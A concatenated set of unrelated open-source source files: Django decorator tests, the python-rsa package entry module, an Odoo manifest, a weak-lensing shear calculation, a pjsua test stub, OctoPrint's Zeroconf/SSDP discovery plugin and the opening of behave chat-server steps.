self.assertEqual(fully_decorated.__dict__['anything'], 'Expected __dict__')
def test_user_passes_test_composition(self):
"""
Test that the user_passes_test decorator can be applied multiple times
(#9474).
"""
def test1(user):
user.decorators_applied.append('test1')
return True
def test2(user):
user.decorators_applied.append('test2')
return True
def callback(request):
return request.user.decorators_applied
callback = user_passes_test(test1)(callback)
callback = user_passes_test(test2)(callback)
class DummyUser(object): pass
class DummyRequest(object): pass
request = DummyRequest()
request.user = DummyUser()
request.user.decorators_applied = []
response = callback(request)
self.assertEqual(response, ['test2', 'test1'])
def test_cache_page_new_style(self):
"""
Test that we can call cache_page the new way
"""
def my_view(request):
return "response"
my_view_cached = cache_page(123)(my_view)
self.assertEqual(my_view_cached(HttpRequest()), "response")
my_view_cached2 = cache_page(123, key_prefix="test")(my_view)
self.assertEqual(my_view_cached2(HttpRequest()), "response")
def test_cache_page_old_style(self):
"""
Test that we can call cache_page the old way
"""
def my_view(request):
return "response"
my_view_cached = cache_page(my_view, 123)
self.assertEqual(my_view_cached(HttpRequest()), "response")
my_view_cached2 = cache_page(my_view, 123, key_prefix="test")
self.assertEqual(my_view_cached2(HttpRequest()), "response")
my_view_cached3 = cache_page(my_view)
self.assertEqual(my_view_cached3(HttpRequest()), "response")
my_view_cached4 = cache_page()(my_view)
self.assertEqual(my_view_cached4(HttpRequest()), "response")
def test_require_safe_accepts_only_safe_methods(self):
"""
Test for the require_safe decorator.
A view returns either a response or an exception.
Refs #15637.
"""
def my_view(request):
return HttpResponse("OK")
my_safe_view = require_safe(my_view)
request = HttpRequest()
request.method = 'GET'
self.assertTrue(isinstance(my_safe_view(request), HttpResponse))
request.method = 'HEAD'
self.assertTrue(isinstance(my_safe_view(request), HttpResponse))
request.method = 'POST'
self.assertTrue(isinstance(my_safe_view(request), HttpResponseNotAllowed))
request.method = 'PUT'
self.assertTrue(isinstance(my_safe_view(request), HttpResponseNotAllowed))
request.method = 'DELETE'
self.assertTrue(isinstance(my_safe_view(request), HttpResponseNotAllowed))
# For testing method_decorator, a decorator that assumes a single argument.
# We will get a TypeError if there is a mismatch in the number of arguments.
def simple_dec(func):
def wrapper(arg):
return func("test:" + arg)
return wraps(func)(wrapper)
simple_dec_m = method_decorator(simple_dec)
# For testing method_decorator, two decorators that add an attribute to the function
def myattr_dec(func):
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
wrapper.myattr = True
return wraps(func)(wrapper)
myattr_dec_m = method_decorator(myattr_dec)
def myattr2_dec(func):
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
wrapper.myattr2 = True
return wraps(func)(wrapper)
myattr2_dec_m = method_decorator(myattr2_dec)
class MethodDecoratorTests(TestCase):
"""
Tests for method_decorator
"""
def test_preserve_signature(self):
class Test(object):
@simple_dec_m
def say(self, arg):
return arg
self.assertEqual("test:hello", Test().say("hello"))
def test_preserve_attributes(self):
# Sanity check myattr_dec and myattr2_dec
@myattr_dec
@myattr2_dec
def func():
pass
self.assertEqual(getattr(func, 'myattr', False), True)
self.assertEqual(getattr(func, 'myattr2', False), True)
# Now check method_decorator
class Test(object):
@myattr_dec_m
@myattr2_dec_m
def method(self):
"A method"
pass
self.assertEqual(getattr(Test().method, 'myattr', False), True)
self.assertEqual(getattr(Test().method, 'myattr2', False), True)
self.assertEqual(getattr(Test.method, 'myattr', False), True)
self.assertEqual(getattr(Test.method, 'myattr2', False), True)
self.assertEqual(Test.method.__doc__, 'A method')
self.assertEqual(Test.method.im_func.__name__, 'method')
class XFrameOptionsDecoratorsTests(TestCase):
"""
Tests for the X-Frame-Options decorators.
"""
def test_deny_decorator(self):
"""
Ensures @xframe_options_deny properly sets the X-Frame-Options header.
"""
@xframe_options_deny
def a_view(request):
return HttpResponse()
r = a_view(HttpRequest())
self.assertEqual(r['X-Frame-Options'], 'DENY')
def test_sameorigin_decorator(self):
"""
Ensures @xframe_options_sameorigin properly sets the X-Frame-Options
header.
"""
@xframe_options_sameorigin
def a_view(request):
return HttpResponse()
r = a_view(HttpRequest())
self.assertEqual(r['X-Frame-Options'], 'SAMEORIGIN')
def test_exempt_decorator(self):
"""
Ensures @xframe_options_exempt properly instructs the
XFrameOptionsMiddleware to NOT set the header.
"""
@xframe_options_exempt
def a_view(request):
return HttpResponse()
req = HttpRequest()
resp = a_view(req)
self.assertEqual(resp.get('X-Frame-Options', None), None)
self.assertTrue(resp.xframe_options_exempt)
# Since the real purpose of the exempt decorator is to suppress
# the middleware's functionality, let's make sure it actually works...
r = XFrameOptionsMiddleware().process_response(req, resp)
self.assertEqual(r.get('X-Frame-Options', None), None)
|
idem2lyon/persomov
|
refs/heads/master
|
libs/rsa/__init__.py
|
111
|
# -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""RSA module
Module for calculating large primes, and RSA encryption, decryption, signing
and verification. Includes generating public and private keys.
WARNING: this implementation does not use random padding, compression of the
cleartext input to prevent repetitions, or other common security improvements.
Use with care.
If you want to have a more secure implementation, use the functions from the
``rsa.pkcs1`` module.
"""
__author__ = "Sybren Stuvel, Barry Mead and Yesudeep Mangalapilly"
__date__ = "2012-06-17"
__version__ = '3.1.1'
from rsa.key import newkeys, PrivateKey, PublicKey
from rsa.pkcs1 import encrypt, decrypt, sign, verify, DecryptionError, \
VerificationError
# Do doctest if we're run directly
if __name__ == "__main__":
import doctest
doctest.testmod()
__all__ = ["newkeys", "encrypt", "decrypt", "sign", "verify", 'PublicKey',
'PrivateKey', 'DecryptionError', 'VerificationError']
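# A minimal usage sketch of the pkcs1 API re-exported above (key size and
# message are illustrative only; production keys should be much larger):
#
#   (pub_key, priv_key) = newkeys(512)
#   crypto = encrypt(b'hello', pub_key)
#   assert decrypt(crypto, priv_key) == b'hello'
#   signature = sign(b'hello', priv_key, 'SHA-256')
#   verify(b'hello', signature, pub_key)  # raises VerificationError on mismatch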
|
loco-odoo/localizacion_co
|
refs/heads/master
|
openerp/addons-extra/odoo-pruebas/odoo-server/addons-extra/stock_account_track/__openerp__.py
|
3
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014 Interconsulting S.A e Innovatecsa SAS.
# (<http://www.interconsulting.com.co).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name": "Stock account track",
"version": "1.0",
"description": """
This module adds a relation between stock moves and account move lines.
""",
"author": "Innovatecsa S.A.S & Interconsulting S.A.",
"website": "http://www.innovatecsa.com",
"category": "Financial",
"depends": [
"account",
"stock",
],
"data":['stock_account_track_view.xml'
],
"demo_xml": [
],
"active": False,
"installable": True,
"certificate" : "",
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
davidharvey1986/pyRRG
|
refs/heads/master
|
src/calc_shear.py
|
1
|
import numpy as np
from astropy.io import fits
import ipdb as pdb
def calc_shear( corrected_moments, outfile,
min_rad=6, mult=2,
size_cut=[0., 100.],
mag_cut=[22.5, 30],
signal_noise_cut=3.,
rhodes_factor=0.86,
dataDir='./',
expThresh=4,
stat_type='median'):
'''
PURPOSE : TO WORK OUT VARIOUS FACTORS AND ADJUST THE PSF
CORRECTED ELLIPTICITY FOR THESE AND GET AN ESTIMATE OF THE SHEAR
INPUT :
CORRECTED_MOMENTS : A fitsrec structure of the corrected
and uncorrected moments to measure
and estimate the shear.
GALAXIES : An integer vector of indexes that correspond to those
CORRECTED_MOMENTS that have been classified as a galaxy
OUTFILE : The name of the FITS file to which the estimated shears,
gamma1 and gamma2, are written
OPTIONAL INPUTS:
MIN_RAD : the minimum measured radius used to weight each galaxy in the
measurement.
SIZE_CUT [LO,HI] : two scalar array, the range of galaxy sizes allowed in the shear measurement
MAG_CUT [LO,HI] : two scalar array, the range of galaxy magnitudes allowed in the shear measurement
SIGNAL_NOISE_CUT : scalar, the lowest acceptable signal to noise allowed in the catalogue
rhodes_factor : The RRG rhodes factor (see paper)
dataDir : the directory in which all the data exists
expThresh : the minimum number of exposures a galaxy must have for an acceptably robust shape.
stat_type : the statistic used over the field of galaxies to estimate the
corrections from ellipticity to shear.
OUTPUT :
OUTFILE : A FITS file named outfile with the same fields as corrected_moments, plus
two extra fields, GAMMA1 and GAMMA2, the two components of the estimated shear.
'''
#Need to filter first, since mean quantities are determined that
#shouldn't include bad galaxies
signal_noise = corrected_moments['FLUX_AUTO'] / \
corrected_moments['FLUXERR_AUTO']
uncut_ell_sqr = corrected_moments['e1']*corrected_moments['e1'] + \
corrected_moments['e2']*corrected_moments['e2']
uncor_size = np.sqrt( 0.5*(corrected_moments.xx_uncorrected + \
corrected_moments.yy_uncorrected))
good = np.ones(len(corrected_moments.x))
good[ (corrected_moments.xx + corrected_moments.yy < 0)] = 0
good[ (uncut_ell_sqr > 2 ) ] = 0
good[ (uncor_size < size_cut[0] )] = 0
good[ (uncor_size > size_cut[1] )] = 0
good[( corrected_moments.MAG_AUTO < mag_cut[0] )] = 0
good[( corrected_moments.MAG_AUTO > mag_cut[1] )] = 0
good[ (signal_noise < signal_noise_cut)] = 0
good[ corrected_moments.nExposures < expThresh ] = 0
good[ (~np.isfinite(corrected_moments.xx)) ] = 0
good[ corrected_moments.prob != 0 ] = 0
momc = corrected_moments[good == 1]
size = np.sqrt( 0.5*(momc.xx + momc.yy))
nObjects=len(momc.xx)
weight = momc['radius']
weight[ momc['radius'] < min_rad] = min_rad
beta = 1./(2.*momc['gal_size']**2*(momc['shear']**2+weight**2))
u1 = beta*(-momc['xxxx']+momc['yyyy'])
u2 = -2.*beta*(momc['xxxy']+momc['xyyy'])
gal_lambda=beta*(momc['xxxx']+2.*momc['xxyy']+momc['yyyy'])
ellipticity_sqr = momc['e1']**2+momc['e2']**2
e_dot_u = momc['e1']*u1+momc['e2']*u2
e_cross_u = momc['e1']*u2-momc['e2']*u1
if stat_type == 'mean':
#These are the mean G1, G2
G2 = 0.5*np.nanmean(e_cross_u)
G1 = 2-np.nanmean(ellipticity_sqr)-\
0.5*np.nanmean(gal_lambda)-\
0.5*np.nanmean(e_dot_u)
elif stat_type =='median':
#The median
G2 = 0.5*np.nanmedian(e_cross_u)
G1 = 2-np.nanmedian(ellipticity_sqr)- 0.5*np.nanmedian(gal_lambda)-0.5*np.nanmedian(e_dot_u)
else:
raise ValueError("Stat type not recognised")
gamma1=momc['e1']/G1/rhodes_factor
gamma2=momc['e2']/G1/rhodes_factor
fits_cols = []
for iName in momc.columns.names:
fits_cols.append( fits.Column(name=iName, format=momc[iName].dtype, array=momc[iName] ) )
newcol = [ fits.Column(name='gamma1', format=gamma1.dtype, array=gamma1),
fits.Column(name='gamma2', format=gamma2.dtype, array=gamma2) ]
hdu = fits.BinTableHDU.from_columns(fits_cols + newcol)
hdu.writeto(outfile, overwrite=True,output_verify='ignore')
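# A minimal, hypothetical usage sketch (the filenames are illustrative; the
# input table must carry the columns referenced above, e.g. e1, e2, xx, yy,
# FLUX_AUTO, radius, gal_size, shear and the fourth-order moments):
#
#   corrected_moments = fits.open('corrected_moments.fits')[1].data
#   calc_shear(corrected_moments, 'shear_catalogue.fits',
#              mag_cut=[22.5, 30], stat_type='median')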
|
AlexanderVangelov/pjsip
|
refs/heads/master
|
tests/pjsua/scripts-sipp/uas-auth.py
|
2
|
# $Id: uas-auth.py 4188 2012-06-29 09:01:17Z nanang $
#
import inc_const as const
PJSUA = ["--null-audio --max-calls=1 --id=sip:a@localhost --username=a --realm=* --registrar=$SIPP_URI"]
PJSUA_EXPECTS = []
|
shaggythesheep/OctoPrint
|
refs/heads/master
|
src/octoprint/plugins/discovery/__init__.py
|
37
|
# coding=utf-8
from __future__ import absolute_import
__author__ = "Gina Häußge <osd@foosel.net>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
__copyright__ = "Copyright (C) 2014 The OctoPrint Project - Released under terms of the AGPLv3 License"
"""
The SSDP/UPNP implementation has been largely inspired by https://gist.github.com/schlamar/2428250
"""
import logging
import os
import flask
import octoprint.plugin
import octoprint.util
try:
import pybonjour
except:
pybonjour = False
__plugin_name__ = "Discovery"
__plugin_author__ = "Gina Häußge"
__plugin_url__ = "https://github.com/foosel/OctoPrint/wiki/Plugin:-Discovery"
__plugin_description__ = "Makes the OctoPrint instance discoverable via Bonjour/Avahi/Zeroconf and uPnP"
__plugin_license__ = "AGPLv3"
def __plugin_load__():
if not pybonjour:
# no pybonjour available, we can't use that
logging.getLogger("octoprint.plugins." + __name__).info("pybonjour is not installed, Zeroconf Discovery won't be available")
plugin = DiscoveryPlugin()
global __plugin_implementation__
__plugin_implementation__ = plugin
global __plugin_helpers__
__plugin_helpers__ = dict(
ssdp_browse=plugin.ssdp_browse
)
if pybonjour:
__plugin_helpers__.update(dict(
zeroconf_browse=plugin.zeroconf_browse,
zeroconf_register=plugin.zeroconf_register,
zeroconf_unregister=plugin.zeroconf_unregister
))
class DiscoveryPlugin(octoprint.plugin.StartupPlugin,
octoprint.plugin.ShutdownPlugin,
octoprint.plugin.BlueprintPlugin,
octoprint.plugin.SettingsPlugin):
ssdp_multicast_addr = "239.255.255.250"
ssdp_multicast_port = 1900
def __init__(self):
self.host = None
self.port = None
# zeroconf
self._sd_refs = dict()
self._cnames = dict()
# upnp/ssdp
self._ssdp_monitor_active = False
self._ssdp_monitor_thread = None
self._ssdp_notify_timeout = 10
self._ssdp_last_notify = 0
##~~ SettingsPlugin API
def get_settings_defaults(self):
return {
"publicHost": None,
"publicPort": None,
"pathPrefix": None,
"httpUsername": None,
"httpPassword": None,
"upnpUuid": None,
"zeroConf": [],
"model": {
"name": None,
"description": None,
"number": None,
"url": None,
"serial": None,
"vendor": None,
"vendorUrl": None
}
}
##~~ BlueprintPlugin API -- used for providing the SSDP device descriptor XML
@octoprint.plugin.BlueprintPlugin.route("/discovery.xml", methods=["GET"])
def discovery(self):
self._logger.debug("Rendering discovery.xml")
modelName = self._settings.get(["model", "name"])
if not modelName:
import octoprint.server
modelName = octoprint.server.DISPLAY_VERSION
vendor = self._settings.get(["model", "vendor"])
vendorUrl = self._settings.get(["model", "vendorUrl"])
if not vendor:
vendor = "The OctoPrint Project"
vendorUrl = "http://www.octoprint.org/"
response = flask.make_response(flask.render_template("discovery.xml.jinja2",
friendlyName=self.get_instance_name(),
manufacturer=vendor,
manufacturerUrl=vendorUrl,
modelName=modelName,
modelDescription=self._settings.get(["model", "description"]),
modelNumber=self._settings.get(["model", "number"]),
modelUrl=self._settings.get(["model", "url"]),
serialNumber=self._settings.get(["model", "serial"]),
uuid=self.get_uuid(),
presentationUrl=flask.url_for("index", _external=True)))
response.headers['Content-Type'] = 'application/xml'
return response
def is_blueprint_protected(self):
return False
##~~ StartupPlugin API -- used for registering OctoPrint's Zeroconf and SSDP services upon application startup
def on_startup(self, host, port):
public_host = self._settings.get(["publicHost"])
if public_host:
host = public_host
public_port = self._settings.get(["publicPort"])
if public_port:
port = public_port
self.host = host
self.port = port
# Zeroconf
self.zeroconf_register("_http._tcp", self.get_instance_name(), txt_record=self._create_http_txt_record_dict())
self.zeroconf_register("_octoprint._tcp", self.get_instance_name(), txt_record=self._create_octoprint_txt_record_dict())
for zeroconf in self._settings.get(["zeroConf"]):
if "service" in zeroconf:
self.zeroconf_register(
zeroconf["service"],
zeroconf["name"] if "name" in zeroconf else self.get_instance_name(),
port=zeroconf["port"] if "port" in zeroconf else None,
txt_record=zeroconf["txtRecord"] if "txtRecord" in zeroconf else None
)
# SSDP
self._ssdp_register()
##~~ ShutdownPlugin API -- used for unregistering OctoPrint's Zeroconf and SSDP service upon application shutdown
def on_shutdown(self):
for key in self._sd_refs:
reg_type, port = key
self.zeroconf_unregister(reg_type, port)
self._ssdp_unregister()
##~~ helpers
# ZeroConf
def zeroconf_register(self, reg_type, name=None, port=None, txt_record=None):
"""
Registers a new service with Zeroconf/Bonjour/Avahi.
:param reg_type: type of service to register, e.g. "_gntp._tcp"
:param name: displayable name of the service, if not given defaults to the OctoPrint instance name
:param port: port to register for the service, if not given defaults to OctoPrint's (public) port
:param txt_record: optional txt record to attach to the service, dictionary of key-value-pairs
"""
if not pybonjour:
return
if not name:
name = self.get_instance_name()
if not port:
port = self.port
params = dict(
name=name,
regtype=reg_type,
port=port
)
if txt_record:
params["txtRecord"] = pybonjour.TXTRecord(txt_record)
key = (reg_type, port)
self._sd_refs[key] = pybonjour.DNSServiceRegister(**params)
self._logger.info(u"Registered {name} for {reg_type}".format(**locals()))
def zeroconf_unregister(self, reg_type, port=None):
"""
Unregisters a previously registered Zeroconf/Bonjour/Avahi service identified by service type and port.
:param reg_type: the type of the service to be unregistered
:param port: the port of the service to be unregistered, defaults to OctoPrint's (public) port if not given
:return:
"""
if not pybonjour:
return
if not port:
port = self.port
key = (reg_type, port)
if not key in self._sd_refs:
return
sd_ref = self._sd_refs[key]
try:
sd_ref.close()
self._logger.debug("Unregistered {reg_type} on port {port}".format(reg_type=reg_type, port=port))
except:
self._logger.exception("Could not unregister {reg_type} on port {port}".format(reg_type=reg_type, port=port))
def zeroconf_browse(self, service_type, block=True, callback=None, browse_timeout=5, resolve_timeout=5):
"""
Browses for services on the local network providing the specified service type. Can be used either blocking or
non-blocking.
The blocking version (default behaviour) will not return until the lookup has completed and
returns all results that were found.
For the non-blocking version, set `block` to `False` and provide a `callback` to be called once the lookup completes.
If no callback is provided in non-blocking mode, a ValueError will be raised.
The results are provided as a list of discovered services, with each service being described by a dictionary
with the following keys:
* `name`: display name of the service
* `host`: host name of the service
* `port`: port the service is listening on
* `txt_record`: TXT record of the service as a dictionary, exact contents depend on the service
Callbacks will be called with that list as the single parameter supplied to them. Thus, the following is an
example for a valid callback:
def browse_callback(results):
for result in results:
print "Name: {name}, Host: {host}, Port: {port}, TXT: {txt_record!r}".format(**result)
:param service_type: the service type to browse for
:param block: whether to block, defaults to True
:param callback: callback to call once lookup has completed, must be set when `block` is set to `False`
:param browse_timeout: timeout for browsing operation
:param resolve_timeout: timeout for resolving operations for discovered records
:return: if `block` is `True` a list of the discovered services, an empty list otherwise (results will then be
supplied to the callback instead)
"""
if not pybonjour:
return None
import threading
import select
if not block and not callback:
raise ValueError("Non-blocking mode but no callback given")
result = []
result_available = threading.Event()
result_available.clear()
resolved = []
def resolve_callback(sd_ref, flags, interface_index, error_code, fullname, hosttarget, port, txt_record):
if error_code == pybonjour.kDNSServiceErr_NoError:
txt_record_dict = None
if txt_record:
record = pybonjour.TXTRecord.parse(txt_record)
txt_record_dict = dict()
for key, value in record:
txt_record_dict[key] = value
name = fullname[:fullname.find(service_type) - 1].replace("\\032", " ")
host = hosttarget[:-1]
self._logger.debug("Resolved a result for Zeroconf resolution of {service_type}: {name} @ {host}".format(service_type=service_type, name=name, host=host))
result.append(dict(
name=name,
host=host,
port=port,
txt_record=txt_record_dict
))
resolved.append(True)
def browse_callback(sd_ref, flags, interface_index, error_code, service_name, regtype, reply_domain):
if error_code != pybonjour.kDNSServiceErr_NoError:
return
if not (flags & pybonjour.kDNSServiceFlagsAdd):
return
self._logger.debug("Got a browsing result for Zeroconf resolution of {service_type}, resolving...".format(service_type=service_type))
resolve_ref = pybonjour.DNSServiceResolve(0, interface_index, service_name, regtype, reply_domain, resolve_callback)
try:
while not resolved:
ready = select.select([resolve_ref], [], [], resolve_timeout)
if resolve_ref not in ready[0]:
break
pybonjour.DNSServiceProcessResult(resolve_ref)
else:
resolved.pop()
finally:
resolve_ref.close()
self._logger.debug("Browsing Zeroconf for {service_type}".format(service_type=service_type))
def browse():
sd_ref = pybonjour.DNSServiceBrowse(regtype=service_type, callBack=browse_callback)
try:
while True:
ready = select.select([sd_ref], [], [], browse_timeout)
if not ready[0]:
break
if sd_ref in ready[0]:
pybonjour.DNSServiceProcessResult(sd_ref)
finally:
sd_ref.close()
if callback:
callback(result)
result_available.set()
browse_thread = threading.Thread(target=browse)
browse_thread.daemon = True
browse_thread.start()
if block:
result_available.wait()
return result
else:
return []
# SSDP/UPNP
def ssdp_browse(self, query, block=True, callback=None, timeout=1, retries=5):
"""
Browses for UPNP services matching the supplied query. Can be used either blocking or
non-blocking.
The blocking version (default behaviour) will not return until the lookup has completed and
returns all results that were found.
For the non-blocking version, set `block` to `False` and provide a `callback` to be called once the lookup completes.
If no callback is provided in non-blocking mode, a ValueError will be raised.
The results are provided as a list of discovered locations of device descriptor files.
Callbacks will be called with that list as the single parameter supplied to them. Thus, the following is an
example for a valid callback:
def browse_callback(results):
for result in results:
print "Location: {}".format(result)
:param query: the SSDP query to send, e.g. "upnp:rootdevice" to search for all devices
:param block: whether to block, defaults to True
:param callback: callback to call in non-blocking mode when lookup has finished, must be set if block is False
:param timeout: timeout in seconds to wait for replies to the M-SEARCH query per interface, defaults to 1
:param retries: number of retries to perform the lookup on all interfaces, defaults to 5
:return: if `block` is `True` a list of the discovered devices, an empty list otherwise (results will then be
supplied to the callback instead)
"""
import threading
import httplib
import io
class Response(httplib.HTTPResponse):
def __init__(self, response_text):
self.fp = io.BytesIO(response_text)
self.debuglevel = 0
self.strict = 0
self.msg = None
self._method = None
self.begin()
result = []
result_available = threading.Event()
result_available.clear()
def browse():
import socket
socket.setdefaulttimeout(timeout)
search_message = "".join([
"M-SEARCH * HTTP/1.1\r\n",
"ST: {query}\r\n",
"MX: 3\r\n",
"MAN: \"ssdp:discovery\"\r\n",
"HOST: {mcast_addr}:{mcast_port}\r\n\r\n"
])
for _ in xrange(retries):
for addr in octoprint.util.interface_addresses():
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind((addr, 0))
message = search_message.format(query=query,
mcast_addr=self.__class__.ssdp_multicast_addr,
mcast_port=self.__class__.ssdp_multicast_port)
for _ in xrange(2):
sock.sendto(message, (self.__class__.ssdp_multicast_addr, self.__class__.ssdp_multicast_port))
try:
data = sock.recv(1024)
except socket.timeout:
pass
else:
response = Response(data)
result.append(response.getheader("Location"))
except:
pass
if callback:
callback(result)
result_available.set()
browse_thread = threading.Thread(target=browse)
browse_thread.daemon = True
browse_thread.start()
if block:
result_available.wait()
return result
else:
return []
##~~ internals
# Zeroconf
def _create_http_txt_record_dict(self):
"""
Creates a TXT record for the _http._tcp Zeroconf service supplied by this OctoPrint instance.
Defines the keys for _http._tcp as defined in http://www.dns-sd.org/txtrecords.html
:return: a dictionary containing the defined key-value-pairs, ready to be turned into a TXT record
"""
# determine path entry
path = "/"
if self._settings.get(["pathPrefix"]):
path = self._settings.get(["pathPrefix"])
else:
prefix = self._settings.global_get(["server", "reverseProxy", "prefixFallback"])
if prefix:
path = prefix
# fetch username and password (if set)
username = self._settings.get(["httpUsername"])
password = self._settings.get(["httpPassword"])
entries = dict(
path=path
)
if username and password:
entries.update(dict(u=username, p=password))
return entries
def _create_octoprint_txt_record_dict(self):
"""
Creates a TXT record for the _octoprint._tcp Zeroconf service supplied by this OctoPrint instance.
The following keys are defined:
* `path`: path prefix to actual OctoPrint instance, inherited from _http._tcp
* `u`: username if HTTP Basic Auth is used, optional, inherited from _http._tcp
* `p`: password if HTTP Basic Auth is used, optional, inherited from _http._tcp
* `version`: OctoPrint software version
* `api`: OctoPrint API version
* `model`: Model of the device that is running OctoPrint
* `vendor`: Vendor of the device that is running OctoPrint
:return: a dictionary containing the defined key-value-pairs, ready to be turned into a TXT record
"""
entries = self._create_http_txt_record_dict()
import octoprint.server
import octoprint.server.api
entries.update(dict(
version=octoprint.server.VERSION,
api=octoprint.server.api.VERSION,
))
modelName = self._settings.get(["model", "name"])
if modelName:
entries.update(dict(model=modelName))
vendor = self._settings.get(["model", "vendor"])
if vendor:
entries.update(dict(vendor=vendor))
return entries
# SSDP/UPNP
def _ssdp_register(self):
"""
Registers the OctoPrint instance as basic service with a presentation URL pointing to the web interface
"""
import threading
self._ssdp_monitor_active = True
self._ssdp_monitor_thread = threading.Thread(target=self._ssdp_monitor, kwargs=dict(timeout=self._ssdp_notify_timeout))
self._ssdp_monitor_thread.daemon = True
self._ssdp_monitor_thread.start()
def _ssdp_unregister(self):
"""
Unregisters the OctoPrint instance again
"""
self._ssdp_monitor_active = False
if self.host and self.port:
for _ in xrange(2):
self._ssdp_notify(alive=False)
def _ssdp_notify(self, alive=True):
"""
Sends an SSDP notify message across the connected networks.
:param alive: True to send an "ssdp:alive" message, False to send an "ssdp:byebye" message
"""
import socket
import time
if alive and self._ssdp_last_notify + self._ssdp_notify_timeout > time.time():
# we just sent an alive, no need to send another one now
return
if alive and not self._ssdp_monitor_active:
# the monitor already shut down, alive messages don't make sense anymore as byebye will shortly follow
return
for addr in octoprint.util.interface_addresses():
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind((addr, 0))
location = "http://{addr}:{port}/plugin/discovery/discovery.xml".format(addr=addr, port=self.port)
self._logger.debug("Sending NOTIFY {} via {}".format("alive" if alive else "byebye", addr))
notify_message = "".join([
"NOTIFY * HTTP/1.1\r\n",
"Server: Python/2.7\r\n",
"Cache-Control: max-age=900\r\n",
"Location: {location}\r\n",
"NTS: {nts}\r\n",
"NT: upnp:rootdevice\r\n",
"USN: uuid:{uuid}::upnp:rootdevice\r\n",
"HOST: {mcast_addr}:{mcast_port}\r\n\r\n"
])
message = notify_message.format(uuid=self.get_uuid(),
location=location,
nts="ssdp:alive" if alive else "ssdp:byebye",
mcast_addr=self.__class__.ssdp_multicast_addr,
mcast_port=self.__class__.ssdp_multicast_port)
for _ in xrange(2):
# send twice, stuff might get lost, it's only UDP
sock.sendto(message, (self.__class__.ssdp_multicast_addr, self.__class__.ssdp_multicast_port))
except:
pass
self._ssdp_last_notify = time.time()
def _ssdp_monitor(self, timeout=5):
"""
Monitor thread that listens on the multicast address for M-SEARCH requests and answers them if they are relevant
:param timeout: timeout after which to stop waiting for M-SEARCHs for a short while in order to put out an
alive message
"""
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
import socket
socket.setdefaulttimeout(timeout)
location_message = "".join([
"HTTP/1.1 200 OK\r\n",
"ST: upnp:rootdevice\r\n",
"USN: uuid:{uuid}::upnp:rootdevice\r\n",
"Location: {location}\r\n",
"Cache-Control: max-age=60\r\n\r\n"
])
class Request(BaseHTTPRequestHandler):
def __init__(self, request_text):
self.rfile = StringIO(request_text)
self.raw_requestline = self.rfile.readline()
self.error_code = self.error_message = None
self.parse_request()
def send_error(self, code, message=None):
self.error_code = code
self.error_message = message
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind(('', self.__class__.ssdp_multicast_port))
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(self.__class__.ssdp_multicast_addr) + socket.inet_aton('0.0.0.0'))
self._logger.info(u"Registered {} for SSDP".format(self.get_instance_name()))
self._ssdp_notify(alive=True)
try:
while (self._ssdp_monitor_active):
try:
data, address = sock.recvfrom(4096)
request = Request(data)
if not request.error_code and request.command == "M-SEARCH" and request.path == "*" and (request.headers["ST"] == "upnp:rootdevice" or request.headers["ST"] == "ssdp:all") and request.headers["MAN"] == '"ssdp:discover"':
interface_address = octoprint.util.address_for_client(*address)
if not interface_address:
self._logger.warn("Can't determine address to user for client {}, not sending a M-SEARCH reply".format(address))
continue
message = location_message.format(uuid=self.get_uuid(), location="http://{host}:{port}/plugin/discovery/discovery.xml".format(host=interface_address, port=self.port))
sock.sendto(message, address)
self._logger.debug("Sent M-SEARCH reply for {path} and {st} to {address!r}".format(path=request.path, st=request.headers["ST"], address=address))
except socket.timeout:
pass
finally:
self._ssdp_notify(alive=True)
finally:
try:
sock.close()
except:
pass
##~~ helpers
def get_uuid(self):
upnpUuid = self._settings.get(["upnpUuid"])
if upnpUuid is None:
import uuid
upnpUuid = str(uuid.uuid4())
self._settings.set(["upnpUuid"], upnpUuid)
self._settings.save()
return upnpUuid
def get_instance_name(self):
name = self._settings.global_get(["appearance", "name"])
if name:
return u"OctoPrint instance \"{}\"".format(name)
else:
import socket
return u"OctoPrint instance on {}".format(socket.gethostname())
|
crazcalm/chat-server
|
refs/heads/master
|
features/steps/server_commands.py
|
1
|
import socket
import time
from subprocess import Popen, PIPE
@given(u'I came connected to the chat server as person1')
def step_impl(context):
context.chat_server = Popen(["python", "server.py"], stdout=PIPE)
# Give the server time to start
time.sleep(3)
context.person1 = socket.create_connection(('localhost', 3333))
@when(u'the client sends {command}')
def step_impl(context, command):
context.person1.sendall(command.strip().encode())
# Give the server time to send response
